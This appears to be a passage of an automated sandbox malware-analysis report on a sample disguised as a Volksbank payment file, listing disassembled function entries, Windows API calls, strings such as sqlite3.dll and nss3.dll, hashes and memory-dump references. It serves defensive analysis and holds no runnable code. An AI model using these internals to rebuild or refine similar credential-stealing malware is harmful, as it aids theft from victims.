• String ID: menu_%d
• API String ID: 1129539653-2417748251
• Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
• Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
• Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
• Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
APIs
Strings
• failed memory resize %u to %u bytes, xrefs: 00411706
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: _msizerealloc
• String ID: failed memory resize %u to %u bytes
• API String ID: 2713192863-2134078882
• Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
• Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
• Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
• Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
APIs
  • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104,?), ref: 00406FA1
• strrchr.MSVCRT ref: 00409808
• _mbscat.MSVCRT ref: 0040981D
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: FileModuleName_mbscatstrrchr
• String ID: _lng.ini
• API String ID: 3334749609-1948609170
• Opcode ID: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
• Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
• Opcode Fuzzy Hash: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
• Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
APIs
• _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
• _mbscat.MSVCRT ref: 004070FA
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: _mbscat$_mbscpystrlen
• String ID: sqlite3.dll
• API String ID: 1983510840-1155512374
• Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
• Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
• Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
• Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
APIs
• GetWindowLongA.USER32(?,000000EC), ref: 004073D0
• SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: LongWindow
• String ID: MZ@
• API String ID: 1378638983-2978689999
• Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
• Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
• Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
• Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: PrivateProfileString
• String ID: A4@$Server Details
• API String ID: 1096422788-4071850762
APIs
• memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
• memcpy.MSVCRT(?,?,?), ref: 0042C917
• memset.MSVCRT ref: 0042C932
• memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
Similarity
• API ID: memcpy$memset
• String ID:
• API String ID: 438689982-0
APIs
• strlen.MSVCRT ref: 0040849A
• memset.MSVCRT ref: 004084D2
• memcpy.MSVCRT(?,00000000,?,?,?,?,7611E430,?,00000000), ref: 0040858F
• LocalFree.KERNEL32(00000000,?,?,?,?,7611E430,?,00000000), ref: 004085BA
Similarity
• API ID: FreeLocalmemcpymemsetstrlen
• String ID:
• API String ID: 3110682361-0
APIs
• memcpy.MSVCRT(?,?,00000010), ref: 004161F4
• memcpy.MSVCRT(?,?,00000004), ref: 00416218
• memcpy.MSVCRT(?,?,00000004), ref: 0041623F
• memcpy.MSVCRT(?,?,00000008), ref: 00416265
Similarity
• API ID: memcpy
• String ID:
• API String ID: 3510742995-0
APIs
  • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
• ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099A3
• ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099CC
• ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099ED
• ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 00409A0E
Similarity
• API ID: ??2@$memset
• String ID:
• API String ID: 1860491036-0
APIs
• strlen.MSVCRT ref: 0040797A
• free.MSVCRT ref: 0040799A
  • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
  • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,00000000,00000000,76940A60,00407A43,00000001,?,00000000,76940A60,00407DBD,00000000,?,?), ref: 00406F64
  • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
• free.MSVCRT ref: 004079BD
• memcpy.MSVCRT(?,?,?,00000001,?,00000000,?,?,00407E04,?,00000000,?,?), ref: 004079DD
Similarity
• API ID: free$memcpy$mallocstrlen
• String ID:
• API String ID: 3669619086-0